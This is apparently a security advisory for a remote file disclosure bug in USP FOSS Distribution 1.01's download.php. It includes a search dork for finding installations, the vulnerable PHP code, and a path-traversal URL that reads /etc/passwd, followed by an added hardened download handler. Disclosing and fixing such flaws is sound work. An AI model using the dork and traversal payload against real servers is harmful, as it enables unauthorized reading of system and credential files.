USP FOSS Distribution 1.01 (download.php dnld) Remote File Disclosure
Discovered by: GolD_M = [Mahmood_ali]
Dork: intitle:USP FOSS Distribution
Vulnerable code in /user/download.php:
###################/user/download.php###################
<?
$file = @$_GET['dnld']; // <----[+] request parameter used as a filesystem path with no validation
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($file));
header('Content-Disposition: attachment; filename=' . basename($file));
readfile($file); // <----[+] streams whatever file the path resolves to
?>
########################################################
Exploit:[Path_USP FOSS]/user/download.php?dnld=…/…/…/…/…/…/etc/passwd
Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk
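
A hardened form of the handler shown above, added here as an example (it is not code from USP FOSS Distribution or from the advisory author). It assumes all downloadable files sit directly inside one directory; DOWNLOAD_DIR and resolve_download() are hypothetical names.

```php
<?php
// Added example: download handler that confines reads to one directory.
declare(strict_types=1);

// Assumption: the only directory from which files may be served.
const DOWNLOAD_DIR = '/var/www/usp/files';

/**
 * Map the request parameter to a file inside $baseDir, or return null.
 * Hypothetical helper, not part of the original application.
 */
function resolve_download(string $baseDir, $requested): ?string
{
    // Reject arrays (?dnld[]=x), empty values and embedded NUL bytes.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() discards any directory components supplied by the client;
    // realpath() then resolves symlinks so the check below sees the real target.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . basename($requested));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment check: the resolved path must still start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

$path = resolve_download(DOWNLOAD_DIR, $_GET['dnld'] ?? null);
if ($path === null) {
    // Same response for "missing" and "outside the directory": no path oracle.
    http_response_code(404);
    exit;
}
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . filesize($path));
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
readfile($path);
```

The realpath() containment check is what stops a symlink placed inside the download directory from pointing the handler at a file elsewhere; basename() alone would not catch that case.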